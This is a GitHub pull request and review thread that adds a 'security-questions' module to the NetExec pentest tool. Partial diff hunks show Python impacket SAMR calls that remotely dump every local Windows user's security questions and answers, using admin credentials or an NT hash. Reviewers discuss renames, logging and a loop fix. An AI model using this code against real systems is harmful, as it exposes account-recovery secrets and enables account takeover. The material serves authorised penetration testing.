### PR TITLE
add new security-questions module

### PR DESCRIPTION
**Pull request by Adamkadaban**
## Description 

this module will dump security questions and answers for all users on the machine assuming run as administrator

requires this PR to work: https://github.com/fortra/impacket/pull/1743

---
Reference: https://hackback.zip/2024/05/08/Remotely-Dumping-Windows-Security-Questions-With-Impacket.html

## Type of change

- [x] New feature (non-breaking change which adds functionality)

## How has this been tested?

Only tested against windows 10 and windows 11.
Ran e2e tests

## Screenshots

image
example output shows `<Username> - <Question>: <Answer>` for each user 

## Checklist

- [x] I have ran Ruff against my changes (via poetry: `poetry run python -m ruff check . --preview`, use `--fix` to automatically fix what it can)
- [x] I have added or updated the tests/e2e_commands.txt file if necessary
- [x] New and existing e2e tests pass locally with my changes
- [x] My code follows the style guidelines of this project (should be covered by Ruff above)
- [x] If reliant on third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki/pull/11)

### CODE REVIEW

**Comment by Marshall-Hallenbeck** [comment]
@Adamkadaban did you run Ruff against this? If you are using poetry: `poetry run python -m ruff check . --preview`

**Comment by Adamkadaban** [comment]
> did you run Ruff against this? 

@Marshall-Hallenbeck Oh sorry, I didn't - but I have now. made the necessary changes and all checks are passing

**Comment by Dfte** [comment]
Quick question but since these informations are dumped calling the SAMR RPC endpoint, can't we simply add this module in the code --sam option ?

**Comment by Adamkadaban** [comment]
@Dfte I considered this too. I would say yes, but afaik `--sam` currently only tries to dump passwords in the same database. 
There are a ton of things we can dump with samr that currently aren't being dumped, so I assumed the best option would be a module

File: nxc/modules/security-questions.py [hunk 1]
```diff
@@ -0,0 +1,124 @@
+from impacket.dcerpc.v5 import samr, transport
+from impacket.nt_errors import STATUS_MORE_ENTRIES
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+import json
```
Comment (mpgn) [inline nxc/modules/security-questions.py:4]: `from json import loads` is a bit cleaner :)

File: nxc/modules/security-questions.py [hunk 2]
```diff
@@ -0,0 +1,124 @@
...
+                for user in resp["Buffer"]["Buffer"]:
+                    # request SAMR ID 30
+                    # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6
+                    r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"])
+                    info = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserResetInformation)
+
+                    resetData = info["Buffer"]["Reset"]["ResetData"]
+                    if resetData == b"":
+                        break
+                    resetData = json.loads(resetData)
```
Comment (mpgn) [inline nxc/modules/security-questions.py:101]: `loads(resetData)`

File: nxc/modules/security-questions.py [hunk 3]
```diff
@@ -0,0 +1,124 @@
...
+                            question = qna["question"]
+                            answer = qna["answer"]
+                            context.log.highlight(f"{user['Name']} - {question}: {answer}")
+
+                    samr.hSamrCloseHandle(dce, r["UserHandle"])
+                enumerationContext = resp["EnumerationContext"]
+                status = resp["ErrorCode"]
+
+        except Exception as e:
+            print(str(e))
```
Comment (NeffIsBack) [inline nxc/modules/security-questions.py:117]: Please use the logger with `.fail()` or `.error()` for error handling

**Review by NeffIsBack — CHANGES_REQUESTED** [review]
Not sure what is happening here, but when i swap out the `print()` for the exception logging this is the traceback:
image

**Comment by Adamkadaban** [comment]
@NeffIsBack 
> Not sure what is happening here, but when i swap out the print() for the exception logging this is the traceback:

This looks like the ~very verbose~ logging that impacket provides when an information class doesn't exist. 

I think this means your impacket is outdated

**Comment by NeffIsBack** [comment]
> @NeffIsBack 
> 
> > Not sure what is happening here, but when i swap out the print() for the exception logging this is the traceback:
> 
> 
> 
> This looks like the ~very verbose~ logging that impacket provides when an information class doesn't exist. 
> 
> 
> 
> I think this means your impacket is outdated

Oh yes, it's late, missed the fortra PR notice. Gonna update impacket and try again👍🏼

**Comment by NeffIsBack** [comment]
Hmm okay so with impacket being updated i get an error on the dc and no output at all on the win11 machine. There should be a local account set up with sec questions.
image
image

The DC debug output:
image

The Win11 debug output (looks like its running fine, but doesn't find anything?):
image

File: nxc/modules/security-questions.py [hunk 4]
```diff
@@ -0,0 +1,127 @@
...
+            self.__nthash = hashList[-1]
+            self.__lmhash = hashList[0]
+        elif context.hash and ":" not in context.hash[0]:
+            self.__nthash = context.hash[0]
+            self.__lmhash = "00000000000000000000000000000000"
+
+        self.getSAMRResetInfo(context)
+
+    def getSAMRResetInfo(self, context):
+        stringbinding = f"ncacn_np:{self.__targetIp}[\\pipe\\samr]"
```
Comment (Marshall-Hallenbeck) [inline nxc/modules/security-questions.py:52]: This should be "string_binding"

File: nxc/modules/security-questions.py [hunk 5]
```diff
@@ -0,0 +1,127 @@
...
+        rpctransport = transport.DCERPCTransportFactory(stringbinding)
```
Comment (Marshall-Hallenbeck) [inline nxc/modules/security-questions.py:53]: rename to "rpc_transport"

File: nxc/modules/security-questions.py [hunk 6]
```diff
@@ -0,0 +1,127 @@
...
+        rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
+
+        try:
+            dce = rpctransport.get_dce_rpc()
+            dce.connect()
+            dce.bind(samr.MSRPC_UUID_SAMR)
+
+            # obtain server handle for samr connection
+            resp = samr.hSamrConnect(dce)
+            serverHandle = resp["ServerHandle"]
```
Comment (Marshall-Hallenbeck) [inline nxc/modules/security-questions.py:70]: rename to "server_handle"

File: nxc/modules/security-questions.py [hunk 7]
```diff
@@ -0,0 +1,127 @@
...
+
+            resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
+            domains = resp["Buffer"]["Buffer"]
+
+            resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, domains[0]["Name"])
+
+            # obtain domain handle for samr connection
+            resp = samr.hSamrOpenDomain(dce, serverHandle=serverHandle, domainId=resp["DomainId"])
+            domainHandle = resp["DomainHandle"]
```
Comment (Marshall-Hallenbeck) [inline nxc/modules/security-questions.py:79]: rename to "domain_handle"

File: nxc/modules/security-questions.py [hunk 8]
```diff
@@ -0,0 +1,127 @@
...
+
+            status = STATUS_MORE_ENTRIES
+            enumerationContext = 0
```
Comment (Marshall-Hallenbeck) [inline nxc/modules/security-questions.py:82]: rename to "enumeration_context"

File: nxc/modules/security-questions.py [hunk 9]
```diff
@@ -0,0 +1,127 @@
...
+                        raise 
+                    resp = e.get_packet()
+
+                for user in resp["Buffer"]["Buffer"]:
+                    # request SAMR ID 30
+                    # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6
+                    r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"])
+                    info = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserResetInformation)
+
+                    resetData = info["Buffer"]["Reset"]["ResetData"]
```
Comment (Marshall-Hallenbeck) [inline nxc/modules/security-questions.py:99]: rename to "reset_data"

**Review by Marshall-Hallenbeck — CHANGES_REQUESTED** [review]
Code looks good, just requesting some variable renames so it's Python3-Pythonic.

**Review by NeffIsBack — APPROVED** [review]
LGTM:
image

Fyi, changed the loop from `break` to `continue` as we would otherwise stop if the first user doesn't have security questions.

**Comment by NeffIsBack** [comment]
Looks like on DC this object doesn't have the UserResetInformation block. I added a try&Except block (with debug logging) just in case other servers have the same problem with some users.
image

**Review by NeffIsBack — APPROVED** [review]

**Review by Marshall-Hallenbeck — APPROVED** [review]

**Pull request merged**